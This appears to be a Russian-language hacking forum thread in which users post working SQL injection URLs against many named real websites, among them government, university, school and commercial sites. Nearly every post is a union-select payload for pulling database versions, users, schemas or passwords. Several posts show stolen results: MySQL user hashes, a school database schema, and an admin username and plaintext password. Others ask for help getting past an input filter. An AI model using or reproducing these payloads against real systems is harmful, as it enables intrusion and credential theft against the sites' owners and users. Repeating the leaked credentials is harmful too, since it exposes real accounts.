Вот ещё: Code: http://www.venezuelanalysis.com/news.php?newsno=-2291+union+select+version()/* http://www.maconintel.com/news.php?article=-179+union+select+1,2,3,version(),5,6,7,8,9/* http://www.respectcoalition.org/2006/news.php?ite=-1274+union+select+version(),2,3,4/*
Code: http://oncoplastic.ru/hospital.php?id=-2+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat(id,char(58),email),0x78),0x78),4,5,6+from+admin/* Code: http://www.happyland.ru/brands.php?id=-2+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* Code: http://www.centresh.ru/article.php?id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x78),0x78),3,4,5,6,7/* Code: http://vpiter.ru/page.php?id=-2+union+select+1,2,3,4,version(),6,7,8/* Code: http://www.uazmadi.ru/works.php?id=-2+union+select+1,2,3,4/*
во первых пиши все одним запросом, почитай про concat(), во вторых твой запрос не верен, он должен быть вот таким Code: http://cemcom.infosci.cornell.edu/projects.php?pid=-12+union+select+1,2,concat(user,char(58),password),4,5,6,7,8,9,10+from+mysql.user/* root:1fc1948a4f4019c6 root: : wordpress:4c939e2e4400bf8a wiki:368560a9410169b5 phpbb2:77c86717526fcef9 phpesp:723444a11c4122af iocrew:60bb08ca538d775c liverank:0991050a06133626 356forum:1c3c515b47e848a9 forum:0f0dbe0300330c1b wikiuser:1fc1948a4f4019c6
там 5 мускул http://silverchips.mbhs.edu/module/poll/pollcomment.php?pid=176+union+select+concat(table_name,0x3a,column_name)%20from%20INFORMATION_SCHEMA.columns/* вот схема: Code: aimresponses --search --reply --link --conditions benhelp --toline --fromline --subject --cc --message --date --owner calendar --type --name --description classaides --aide classannc --text --time classes --title --teacher --room --department --period --semester --classtime --description --fallyear classsched --sid --name --comment --assndate --assntype --block --instime comments --cid --uname --time --comment coursedisc --discid directory --streetadd --city --stateprov --zip --phone --email --homepage --message discussions --title --type --subtype --description --time --hits --prevdiscid files --action --contents groupmembers --uname groups links --slave maliasDB --username --oneway parentlinks --student passwd --passwd peoplelinks --friend prefs --title --fnamecfg --mnamecfg --cols --fileexpert --commanderror registrations --fname --lname --mname --type --email --streetadd --city --stateprov --zip --phone --students --uname --owner --status scheds --semester --id --fallyear userinfo --fname --lname --mname --id --grp --class --permissions --lastlogin --lastip
Code: http://www.razvitie.su/news.php?id=-116+union+select+1,version(),3,4/* http://www.nukuteater.ee/news.php?news_id=-60+union+select+1,2,version(),4,5,6/*
www.maineservicecommission.gov Code: http://www.maineservicecommission.gov/news/release.php?ID=-1+union+select+1,2,version(),user(),database(),6,7,8,9,10,11,12/* www.tam.ca.gov Code: http://www.tam.ca.gov/view.php?id=-1+union+select+1,2,concat(version(),0x3a,user()%20,0x3a,database()),4/*
http://www.psat.wa.gov Code: http://www.psat.wa.gov/Publications/news_stories/hoodcanal_news_story.php?id=-131+union+select+concat(user(),version()),2,3,4,5,6,7,8/*
http://www.rudtp.ru/icc.php?id='+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/* http://www.cmbc.ru/courses.php?ID=-2'+union+select+1,2,concat(version(),0x3a,database()),4/*
SQL HTML: http://market.ya1.ru/market_search.php?search=%271%2C2%2C3%2C4%2F**%2F%3C%3F%2B%24www%3D%24_get%5B Как дальше продолжуть я незнаю.Стоит фильтр.Всё перепробовал.Наверное это говорит о том что мало опыта в иследовании sql HTML: http://market.ya1.ru/market_search.php?search=%27union%2Bfrom%2Bselect%2Buser%2C2%2C3%27%2F* так же нашел HTML: http://market.ya1.ru/market_search.php?search=12%2F**%2F%3C%3F%2B%24www%20%20%3D%24_get%5B%22.ru%22%5D%3B%3F%3E%3F%3E%3F%3E%3F%%20%203E%3F%3E%3F%3E%3F%3E%3F%3E%3F%3E%3F%3E%ED%E0%E2%E5%20%20%F0%ED%EE%E5+%E4%E0%ED%ED%EE%E5+%EC%EE%E6%ED%EE+%E%20%20A%E0%EA-%F2%EE+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%F2%FC+%2C%F2%20%20%EE%EB%FC%EA%EE+%FF+%ED%E5%E7%ED%E0%FE+%EA%E0%EA+%%20%2029%29 последнее к sql не относиться, но как ипользовать не знаю
GlooK Он и не может получиться Code: http://www.nero.com/eng/showpress.php?id=1233+AND+ascii(lower(substring(Version(),1,1)))=51/* 3 версия Code: http://www.shejay.net/artistDetail.php?userID=2193%20and%201=-1%20union%20select%201,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,concat(username,char(58),password,char(58),email),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33%20from%20users/* admin:kellyshe Логиниться на той же странице
... Code: http://www.ethanolrfa.org/resource/papers/view.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/* http://www.volunteermaine.org/news/release.php?ID=-251+union+select+1,2,concat(user(),version()),4,5,6,7,8,9,10,11,12/* http://www.grrn.org/releases/release.php?rid=79&rhid=1&id=-10+union+select+1,concat(user(),version()),3,4,5,6,7/*
